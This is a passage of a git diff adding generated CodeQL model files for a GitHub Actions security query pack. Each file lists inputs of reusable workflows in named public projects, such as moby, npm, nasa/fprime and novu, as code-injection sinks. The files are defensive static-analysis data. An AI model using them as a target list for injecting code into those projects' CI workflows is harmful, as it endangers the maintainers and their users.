"code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 000000000000..6e898a4e4524 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 000000000000..a08a96a897e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..f7aafb134559 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 000000000000..6107ae0e57ce --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 000000000000..74e0182cc4f6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 000000000000..4bbd06a86f57 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 000000000000..59bdab8f39ba --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 000000000000..6988e25d41c3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 000000000000..3c025f59b787 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 000000000000..5de0d170d40a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 000000000000..19d38d1241d1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 000000000000..b1c787677a6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 000000000000..249c734f55bb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 000000000000..46951b5436d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 000000000000..cd1d0f318ef5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 000000000000..4055874a790f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 000000000000..bccd7271b08a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 000000000000..56528159143a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 000000000000..c4a9b07ed997 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 000000000000..db4f26083a0f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 000000000000..c12a079e2e21 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 000000000000..3b7122a7a139 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 000000000000..3e80edaaaff5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 000000000000..99717acf0244 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 000000000000..d9a066c2b220 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 000000000000..83e68740ac09 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 000000000000..45f05ea88263 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 000000000000..1cd25da918fa --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 000000000000..2d5a077f1f48 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 000000000000..98571dfc5d94 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 000000000000..8cbd1927fe0c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 000000000000..6d3466f09274 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 000000000000..c7178a298efc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 000000000000..08feb2033ffb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 000000000000..3483cc13b9e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 000000000000..45350e121a04 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 000000000000..9665157b3ad4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 000000000000..9ef65a67c038 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -0,0 +1,7 @@ +extensions: 